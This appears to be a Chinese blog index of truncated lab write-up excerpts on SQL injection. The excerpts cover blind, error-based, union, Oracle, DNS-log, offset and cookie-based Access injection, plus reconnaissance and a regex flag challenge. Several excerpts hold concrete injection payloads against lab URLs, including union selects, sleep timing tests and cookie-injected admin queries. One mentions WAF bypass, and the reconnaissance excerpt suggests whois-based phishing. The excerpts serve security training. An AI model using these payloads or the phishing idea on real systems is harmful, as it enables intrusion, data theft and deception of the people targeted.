SQL注入-盲注-
熟悉的界面,熟悉动作,不一样的语法;一、?id=1http://120.203.13.75:8150/New/BlindBased/RankOne/sql-one/http://120.203.13.75:8150/New/BlindBased/RankOne/sql-one/?id=1二、尝试;order by 参数http://120.203.13.75:8150/New/BlindBased
QL注入-显错注入Rank 1
显错注入-联合查询 (Mysql数据库 ) 的基本流程显错注入--是否存在注入点(and1=1)--猜解字段数(order by )--联合查询(union)--然后区系统自带库查询表面、地段(limit)--查询我们需要的字段值判断;id=1http://120.203.13.75:8150/New/ErrorBased/RankOne/sql-one/?id=1http://120.203.1
信息收集-网络-前端-系统
一、网络信息收集1、通过一下在线的网站工具例如;国内;https://www.17ce.com/国外;https://www.netcraft.com/收集一下主域名、二级域名以及服务器真实IP当拿到一个域名的时候,我们首先应该进行whois查询,可以使kali下面的 whois命令或者使用在线工具,比如说whois查询,通过查询域名的注册人信息,我们可以对其进行社工钓鱼。或者我们可以有针对性的利
正则表达式--递减排除
要求提示;通过get传参 在地址栏上输入正确的id值 爆出flag(老师没给提示,对于新手不好理解)1、问题; $Regular= preg_match("/zkaq.*key.{2,9}:\/.*\/(key*key)/i", trim($_GET["id"]), $match); 2、分析;2-1; /&nbs
Oracle注入-报错注入
第一;使用联合查询 首先我们使用‘ 单引号给闭合掉,考虑到后面会干扰所以要注释掉,使用 --注释http://o1.lab.aqlab.cn:81/?id=1’-- 如下;http://o1.lab.aqlab.cn:81/?id=1%27%20--第二;使用order by 参数http://o1.lab.aqlab.cn:81/?id=1%27order by 1%2
反弹注入-利用第三方云实现
/////////////////////////////////////////////////////////////////////////////////////////////////  
全方位注入
http://120.203.13.75:6815/?id=1http://120.203.13.75:6815/?id=1 and 1=2http://120.203.13.75:6815/?id=1%20and%201=2%20union%20select%201,database()?id=1 and 1=2 union select 1,table_name from informatio
DNS注入利用日志获取回显
安全狗,想办法绕过备注;http://120.203.13.75:8120/index3.php/1.txt 【添加了一个/1.txt 】回车/1.txt?id=1/1.txt?id=1 and 1=1 /1.txt?id=1 and 1=2检查以下,是否有延时注入;sleep(5)%23http://120.203.13.75:8120/index3
偏移注入-数据库字段数
重点在隐藏同样的出数字 7,结果却相差甚远第一个七document.cookie="ID="+escape("105 union select 1,2,3,4,5,6,7,admin.*,24,25,26 from admin");右键审查元素;第二个 七document.cookie="ID="+escape("105 uni
Access注入-利用Cookie实现偏移注入
点击传送进入实操页面输入?and 1 = 1 回车 ,提示;显示传参错误,如图 被拦截尝试cookie注入一下,看看F12进入浏览器 编辑页面,找到 Console 功能,输入参数,构建一个Cookie语句document.cookie="id="+escape("105 ");页面正常显示 测试一下,看有没有注入点